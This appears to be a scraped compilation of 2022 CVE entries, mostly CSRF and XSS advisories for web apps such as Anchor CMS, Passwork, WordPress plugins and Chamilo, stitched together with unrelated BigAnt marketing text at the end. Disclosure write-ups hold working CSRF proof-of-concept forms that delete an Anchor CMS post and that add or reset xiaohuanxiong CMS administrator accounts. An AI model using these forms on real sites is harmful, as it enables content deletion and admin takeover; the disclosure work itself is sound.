Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component anchor/routes/posts.php. This vulnerability allows attackers to arbitrarily delete posts.

**anchorcms-0.12.7-CSRF**

CSRF (Cross-site request forgery) Vulnerability discovered in Anchor CMS v0.12.7 and that can delete posts.

**Vulnerability Analysis**

Request interface for adding, deleting, modifying and checking posts in anchor/routes/posts.php.

let us see code it delete a posts.

https://github.com/anchorcms/anchor-cms/blob/master/anchor/routes/posts.php#L355

        /**
         * Delete post
         */
        Route::get('admin/posts/delete/(:num)', function ($id) {
            Post::find($id)->delete();
            Comment::where('post', '=', $id)->delete();
    
            Query::table(Base::table('post_meta'))
                 ->where('post', '=', $id)
                 ->delete();
    
            Notify::success(__('posts.deleted'));
    
            return Response::redirect('admin/posts');
        });
    

There is no check on token or referer and delete directly.

**Reproduce and PoC**

1.  Login in as a admin.
2.  create some posts for deleteing
3.  use brupsuite get a delete request packet

    GET /admin/posts/delete/6 HTTP/1.1
    Host: 192.168.1.89
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://192.168.1.89/admin/posts/edit/3
    Cookie: anchorcms=ng848botkffiu4c1lrgbgo50ri
    Upgrade-Insecure-Requests: 1
    
    

The request just delete a posts that id is 6.

4.  use brupsuite to generat a csrf PoC.

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.89/admin/posts/delete/6">
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Then save the PoC code to a exploit.html, and click exploit.html to csrf attack. ![1](https://user-images.githubusercontent.com/11525772/154665895-36b7575d-368d-495c-830e-80fc17bc02c0.jpg)

click it to send a request and delete it successfully. ![1645180292(1)](https://user-images.githubusercontent.com/11525772/154665976-e329e3d5-b820-43fa-a9c3-d8dce7f085b1.jpg)

CVE-2022-25576: GitHub - butterflyhack/anchorcms-0.12.7-CSRF: Vulnerability Analysis

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

CVE-2022-25266

Passwork On-Premise Edition before 4.6.13 allows migration/downloadExportFile Directory Traversal (to read files).

After authorization with the Owner account, it will be possible to read files located outside the web directory on the server

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25267

Passwork On-Premise Edition before 4.6.13 allows migration/uploadExportFile Directory Traversal (to upload files).

After logging in with the Owner account, an intruder has the ability to upload arbitrary files by sending specially generated HTTP requests

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25268

Passwork On-Premise Edition before 4.6.13 allows CSRF via the groups, password, and history subsystems.

CSRF token value does not change during the session and can be obtained by an attacker as a result of exploitation of the "Cross-site scripting" vulnerability.

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25269

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

An attacker can inject arbitrary HTML tags, including JavaScript scripts, into a page processed by a user's browser

Discoverer: Positive technologies, Roman Poneev

CVE-2022-25269: Description of CVE-2022-25266, CVE-2022-25267, CVE-2022-25268, CVE-2022-25269

Cross-Site Request Forgery (CSRF) in Yoo Slider – Image Slider & Video Slider (WordPress plugin) allows attackers to trick authenticated users into unwanted slider duplicate or delete action.

**yoo-slider**

**Software**

**Yoo Slider**

**Vulnerable Versions**

**<= 2.0.0**

**Fixed in version**

**2.1.0**

**CVE**

**CVE-2022-25608**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-03-21**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete discovered by Ngo Van Thien (Patchstack Alliance) in WordPress Yoo Slider plugin (versions <= 2.0.0).**

**Solution**

**Update the WordPress Yoo Slider plugin to the latest available version (at least 2.1.0).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25608: WordPress Yoo Slider plugin <= 2.0.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete - Patchstack

The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to reflected cross-site scripting due to missing sanitization of the files filename parameter found in the ~/includes/ajax/controllers/uploads.php file which can be used by unauthenticated attackers to add malicious web scripts to vulnerable WordPress sites, in versions up to and including 3.3.12.

CVE-2022-0889: Vulnerability Advisories - Wordfence

The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/includes/ajax/controllers/uploads.php file which can be bypassed making it possible for unauthenticated attackers to upload malicious files that can be used to obtain remote code execution, in versions up to and including 3.3.0

CVE-2022-0888: Vulnerability Advisories - Wordfence

The Amelia WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the lastName parameter found in the ~/src/Application/Controller/User/Customer/AddCustomerController.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user accesses the booking calendar with the date the attacker has injected the malicious payload into. This affects versions up to and including 1.0.46.

CVE-2022-0834: Vulnerability Advisories - Wordfence

An issue was discovered in xiaohuanxiong CMS 5.0.17 There is a CSRF vulnerability that can that can add the administrator account and modify administrator account's password.

After the administrator logged in, open the following two page and Click the button, you can use javascript to create a PoC that is triggered directly  
poc:one--->add new administrator account

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://xiaohuangxiong.test/admin.php/Admins/create.html" method="POST">
          <input type="hidden" name="username" value="admin2" />
          <input type="hidden" name="password" value="123456" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://xiaohuangxiong.test/admin.php/Admins/edit.html" method="POST">
          <input type="hidden" name="id" value="1" />
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="password" value="12345678" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2021-43738: There is two CSRF vulnerability that can add the administrator account and modify administrator account's password · Issue #28 · hiliqi/xiaohuanxiong

A Cross-Site Request Forgery (CSRF) in Chamilo LMS 1.11.14 allows attackers to execute arbitrary commands on victim hosts via user interaction with a crafted URL.

CVE-2021-40662: Security issues - Chamilo LMS

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.

CVE-2021-38745: Security issues - Chamilo LMS

BigAnt Software BigAnt Server v5.6.06 was discovered to contain a Cross-Site Request Forgery (CSRF).

**![logo](https://www.bigant.com/wp/wp-content/uploads/2014/03/logo.png)**

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_ba.jpg)

**Support**

Comments? Queries? Having an issue? Contact Big Ant Support here.

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_fb.jpg)

**Facebook**

Go to the Big Ant Facebook page for the latest news.

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_t.jpg)

**Twitter**

Go to the Big Ant Twitter page for current updates.

**AO Tennis 2 is available now!**

BIGBEN and Big Ant Studios, Australia’s leading developer of sports titles, are delighted to announce their partnership for the publishing ...

**BIGANTFORUMS**

Join the Big Ant forums and keep up to date with the latest news and current hot topics.

Become part of the BigAnt community.

GO TO FORUMS

Tag

#csrf